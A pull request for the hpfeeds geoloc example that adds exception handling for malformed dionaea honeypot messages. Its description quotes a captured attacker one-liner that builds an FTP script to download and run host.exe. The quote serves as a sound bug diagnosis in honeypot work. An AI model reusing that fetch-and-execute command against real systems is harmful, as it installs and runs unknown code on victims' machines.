### PR TITLE
Catch invalid messages

### DIFF
--- a/examples/geoloc/geoloc.py
+++ b/examples/geoloc/geoloc.py
@@ -1,4 +1,3 @@
-
 import sys
 import datetime
 import logging
@@ -44,7 +43,11 @@ def main():
 		procs = PROCESSORS.get(channel, [])
 		p = None
 		for p in procs:
-			m = p(identifier, payload, gi)
+			try:
+				m = p(identifier, payload, gi)
+			except:
+				print "invalid message %s" % payload
+				continue
 			try: tmp = json.dumps(m)
 			except: print 'DBG', m
 			if m != None: hpc.publish(GEOLOC_CHAN, json.dumps(m))


### PR DESCRIPTION
Sometimes the messages received from the dionaea hpfeeds module are somehow messed up.
For example:
When an attacker executes this command:

``` bash
echo open 0.0.0.0 47659 > o&echo user 1 1 >> o &echo get host.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &host.exe
```

The payload sent from dionaea is the following:

``` json
{"connection_type": "connect", "local_host": "127.0.0.1", "connection_protocol": "ftpctrl", "remote_port": 47659, "local_port": 59381, "remote_hostname": "0.0.0.0", "connection_transport": "tcp", "remote_host": ""}
```

Notice the empty remote_host here, this causes the following error:

>   File "~/hpfeeds/broker/geoloc/processors.py", line 24, in get_addr_family
>     ainfo = socket.getaddrinfo(addr, 1, socket.AF_UNSPEC, socket.SOCK_STREAM)
> gaierror: [Errno -5] No address associated with hostname

For sure this is only a workaround and it would be better if the messages gets validated in the dionaea module. 
